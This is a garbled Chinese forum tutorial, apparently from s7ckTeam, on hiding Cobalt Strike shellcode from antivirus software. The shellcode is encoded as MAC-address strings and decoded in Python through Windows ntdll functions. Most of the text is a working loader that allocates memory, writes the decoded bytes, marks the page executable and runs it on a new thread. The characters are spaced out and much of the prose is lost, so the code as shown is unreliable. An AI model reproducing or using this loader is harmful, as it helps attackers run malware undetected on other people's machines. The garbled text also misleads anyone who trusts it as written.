[777] 2021-06-08_CS免杀-MAC写入内存(python)

文档创建者:s7ckTeam
浏览次数:15
最后更新:2025-01-16
2021-06-08_CS免杀-MAC写入内存(python) C S - M A C ( p y t h o n ) b g b i n g   2 0 2 1 - 0 6 - 0 8 X G   X G X G u u i d C S - U U I D ( p y t h o n ) a p i u u i d a p i t o   a   b i n a r y R t l E t h e r n e t S t r i n g T o A d d r e s s A R t l E t h e r n e t A d d r e s s T o S t r i n g A X G   . W e b P y t h o n
M A C m a c M A C M A C E P R O M I P M A C I P 3 2 M A C 4 8 6   M A C R t l E t h e r n e t A d d r e s s T o S t r i n g A n t d l l . d l l m a c 使 m a c 6 m a c x 0 0 6 x 0 0 s h e l l c o d e m a c m a c m a c 6 1 7 1 7 m a c x F C x 4 8 x 8 3 x E 4 x F 0 x E 8   = = = = >   F C - 4 8 - 8 3 - E 4 - F 0 - E 8 h t t p s : / / d o c s . m i c r o s o f t . c o m / e n - u s / w i n d o w s / w i n 3 2 / a p i / i p 2 s t r i n g / n f - i p 2 s t r i n g - r t l e t h e r n e t a d d r e s s t o s t r i n g a N T S Y S A P I   P S T R   R t l E t h e r n e t A d d r e s s T o S t r i n g A (     c o n s t   D L _ E U I 4 8   * A d d r ,     P S T R                       S ) ; s h e l l c o d e   =   b ' x f c x 4 8 x 8 3 x e 4 . . . ' m a c m e m   =   c t y p e s . w i n d l l . k e r n e l 3 2 . V i r t u a l A l l o c ( 0 , l e n ( s h e l l c o d e ) / 6 * 1 7 , 0 x 3 0 0 0 , 0 x 4 0 ) f o r   i   i n   r a n g e ( l e n ( s h e l l c o d e ) / 6 ) :           b y t e s _ a   =   s h e l l c o d e [ i * 6 : 6 + i * 6 ]           c t y p e s . w i n d l l . N t d l l . R t l E t h e r n e t A d d r e s s T o S t r i n g A ( b y t e s _ a ,   m a c m e m + i * 1 7 ) a   =   c t y p e s . s t r i n g _ a t ( m a c m e m , l e n ( s h e l l c o d e ) * 3 - 1 ) p r i n t ( a )
m a c M A C s h e l l c o d e M A C R t l E t h e r n e t S t r i n g T o A d d r e s s A n t d l l . d l l M A C l i s t   =   [ ] f o r   i   i n   r a n g e ( l e n ( s h e l l c o d e ) / 6 ) :         d   =   c t y p e s . s t r i n g _ a t ( m a c m e m + i * 1 7 , 1 7 )         l i s t . a p p e n d ( d ) p r i n t ( l i s t ) i m p o r t   c t y p e s l i s t   =   [ ' F C - 4 8 - 8 3 - E 4 - F 0 - E 8 ' ,   ' C 8 - 0 0 - 0 0 - 0 0 - 4 1 - 5 1 ' ,   ' 4 1 - 5 0 - 5 2 - 5 1 - 5 6 - 4 8 ' ,   ' 3 1 - D 2 - 6 5 - 4 8 - 8 B - 5 2 ' ,   ' 6 0 - 4 8 - 8 B - 5 2 - 1 8 - 4 8 ' . . . . . . ] F C - 4 8 - 8 3 - E 4 - F 0 - E 8   = = = = >   x F C x 4 8 x 8 3 x E 4 x F 0 x E 8 h t t p s : / / d o c s . m i c r o s o f t . c o m / e n - u s / w i n d o w s / w i n 3 2 / a p i / i p 2 s t r i n g / n f - i p 2 s t r i n g - r t l e t h e r n e t s t r i n g t o a d d r e s s a N T S Y S A P I   N T S T A T U S   R t l E t h e r n e t S t r i n g T o A d d r e s s A (     P C S T R         S ,     P C S T R         * T e r m i n a t o r ,     D L _ E U I 4 8   * A d d r ) ;
m a c l e n ( l i s t ) * 6 m a c 6 R t l E t h e r n e t S t r i n g T o A d d r e s s A m a c r w x p a g e r w x p a g e + = 6 m a c 6 线 使 p y 2 . 7 C S 6 4 s h e l l c o d e c t y p e s . w i n d l l . N t d l l . R t l E t h e r n e t S t r i n g T o A d d r e s s A ( m a c , m a c ,   p t r ) p t r   =   c t y p e s . w i n d l l . k e r n e l 3 2 . V i r t u a l A l l o c ( 0 , l e n ( l i s t ) * 6 , 0 x 3 0 0 0 , 0 x 0 4 ) r w x p a g e   =   p t r f o r   i   i n   r a n g e ( l e n ( l i s t ) ) :         c t y p e s . w i n d l l . N t d l l . R t l E t h e r n e t S t r i n g T o A d d r e s s A ( l i s t [ i ] ,   l i s t [ i ] ,   r w x p a g e )         r w x p a g e   + =   6 c t y p e s . w i n d l l . k e r n e l 3 2 . V i r t u a l P r o t e c t ( p t r ,   l e n ( l i s t ) * 6 ,   0 x 4 0 ,   c t y p e s . b y r e f ( c t y p e s . c _ l o n g ( 1 ) ) ) h a n d l e   =   c t y p e s . w i n d l l . k e r n e l 3 2 . C r e a t e T h r e a d ( 0 ,   0 ,   p t r ,   0 ,   0 ,   0 ) c t y p e s . w i n d l l . k e r n e l 3 2 . W a i t F o r S i n g l e O b j e c t ( h a n d l e ,   - 1 )
线 姿 m a c
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则